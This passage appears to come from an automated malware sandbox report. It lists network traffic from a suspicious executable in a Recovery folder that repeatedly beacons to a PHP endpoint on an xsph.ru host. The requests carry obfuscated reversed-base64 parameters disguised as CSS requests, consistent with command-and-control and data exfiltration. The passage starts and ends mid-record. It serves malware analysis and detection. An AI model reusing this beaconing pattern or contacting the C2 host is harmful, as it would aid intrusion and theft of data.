May 24, 2024 11:08:53.823683977 CEST	80	49756	141.8.192.26	192.168.2.4
May 24, 2024 11:08:54.474562883 CEST	80	49756	141.8.192.26	192.168.2.4
May 24, 2024 11:08:54.526732922 CEST	49756	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:59.480397940 CEST	49757	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:59.485662937 CEST	80	49757	141.8.192.26	192.168.2.4
May 24, 2024 11:08:59.485742092 CEST	49757	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:59.485892057 CEST	49757	80	192.168.2.4	141.8.192.26
May 24, 2024 11:08:59.490843058 CEST	80	49757	141.8.192.26	192.168.2.4
May 24, 2024 11:08:59.546752930 CEST	80	49757	141.8.192.26	192.168.2.4
May 24, 2024 11:09:00.170661926 CEST	80	49757	141.8.192.26	192.168.2.4
May 24, 2024 11:09:00.214829922 CEST	49757	80	192.168.2.4	141.8.192.26

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 11:07:07.929516077 CEST	51416	53	192.168.2.4	1.1.1.1
May 24, 2024 11:07:08.110831976 CEST	53	51416	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 24, 2024 11:07:07.929516077 CEST	192.168.2.4	1.1.1.1	0x292f	Standard query (0)	a0985701.xsph.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 24, 2024 11:07:08.110831976 CEST	1.1.1.1	192.168.2.4	0x292f	No error (0)	a0985701.xsph.ru		141.8.192.26	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

a0985701.xsph.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:08.125503063 CEST	611	OUT	GET /8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy&7545dfb3365e5b9fe53ef5879182e1a7=0df81b81d71e3e7c3a0591c145dca1b2&64f08b8004af955eddd13c6a6e9c8200=QNzATY3I2NxImYzQDM4EDMihjY4ImNmJWYwAzYwQmZmV2MxcDNhBDN&JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:07:08.907716036 CEST	1236	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2160 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3d 3d 51 66 69 51 6a 5a 68 52 47 4f 31 45 6a 5a 33 59 47 4f 30 55 44 4d 79 63 6a 4d 69 5a 6d 59 34 45 57 4d 30 45 7a 4d 6c 6c 54 59 6b 46 57 59 69 6f 6a 49 6d 52 6a 5a 6a 4e 57 4e 35 51 47 4f 34 55 6d 4d 77 4d 6d 4e 7a 6b 54 4e 79 49 6d 4e 31 49 6d 59 32 49 44 4f 78 55 47 4f 33 49 6d 49 73 49 69 5a 52 39 32 64 50 6c 6d 53 35 70 46 57 53 6c 6e 57 59 70 56 64 69 42 6a 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 39 55 52 61 56 6c 56 57 6c 7a 63 69 4a 6a 53 30 56 6d 56 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 5a 6b 54 57 6c 6b 61 76 6c 6d 57 58 4a 6c 64 52 4e 44 62 71 4a 57 62 57 6c 33 59 75 5a 6c 61 59 4a 54 4e 77 70 31 4d 57 4e [TRUNCATED] Data Ascii: ==QfiQjZhRGO1EjZ3YGO0UDMycjMiZmY4EWM0EzMllTYkFWYiojImRjZjNWN5QGO4UmMwMmNzkTNyImN1ImY2IDOxUGO3ImIsIiZR92dPlmS5pFWSlnWYpVdiBjT1klM1w2YupUMZFTO1F2VkFjYIJkdad1Ypl0QBtETDl0aJp2bp9URaVlVWlzciJjS0VmVOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavlmYHlTaihFbUV2VOVnWYpUekdlTmJWbs5GZXh3diJjVulUaBd2QpdXaSZkTWlkavlmWXJldRNDbqJWbWl3YuZlaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFDbmRmMW9ETxgHaZJDb5p1VxIUSq9WaadVN2VWbWRXYYJlZi1GbuR2V4dnYyYlbJlWQnNUa3lWTElUaPlmS6R2VstWWWpUNZJjR5R2VOpWUXVjdhhlUollM5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkanJTTEFUdOR0Y0lkavlmWXJVMkdEbuJWb5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkaNlXTUNWdNRUUp9UaKxmWIZFMhhlUoJmR5UXYXRWMihkQ2p1VjlWSDF0SMNkSollMslnWXFjQJdEawMWb58USq9WaadVMoRlbSVnWXVDckdUN2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNkSCRVaJZTStZ1aiBjTwIWbWVXYYJVdiJjTmJWbs5GZXh3diJjVulUaBd2QphHbjJDeoplavlmWYJFajxmUCZlbWxGWyUDcaNjVzN2R5wmW5l0ZJF0bz1ERvlmVVZVdhZVO1F2VkFjYIJkdad1Ypl0QBtETDpkeahlUoRmRNdmWHZFMhdVNWlkavlmWXFDaU5Gb5R2R1EjYy4kZi1GbuR2V4dnYyYlbJlWQnNUa3lWVxUVaPlmSsp1R5QUZYpEMi5mV2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNUS41ERVl2T [TRUNCATED]
May 24, 2024 11:07:08.912414074 CEST	1108	IN	Data Raw: 7a 6c 55 61 4a 5a 54 53 74 5a 31 61 69 42 6a 54 6f 70 46 57 4b 68 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 62 30 6c 6e 59 78 73 32 5a 6b 4a 6a 56 50 6c 6b 61 76 6c 6d 57 58 46 44 61 55 31 57 4e 32 46 Data Ascii: zlUaJZTStZ1aiBjTopFWKhGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb0lnYxs2ZkJjVPlkavlmWXFDaU1WN2F2Vkx2YslTdhdFZxIGSCZnWXNWaJNUQLx0QKpFVplkNJ1mVrJGMOVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2QpdXahNjS2d1UCNjWVRTaPlmS1JmMs5mWYpkZi1GbuR2V4dnYyYlbJlWQnNUa3lWYzokdXNlQzoV
May 24, 2024 11:07:09.140894890 CEST	2132	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:07:09.472405910 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:09.200311899 CEST	731	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:07:09.894076109 CEST	158	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
May 24, 2024 11:07:09.899969101 CEST	1246	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&b23843f8eb998a6848c0ef54cab04792=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2N [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:07:10.118223906 CEST	158	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:14.552726984 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:07:15.258023024 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:20.288510084 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:07:21.089430094 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:26.110286951 CEST	2158	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru Connection: Keep-Alive
May 24, 2024 11:07:26.794965029 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:31.817857027 CEST	2134	OUT	GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: a0985701.xsph.ru
May 24, 2024 11:07:32.531474113 CEST	264	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 24 May 2024 09:07:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65 Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	141.8.192.26	80	7992	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 11:07:37.554546118 CEST	2134	OUT	GET 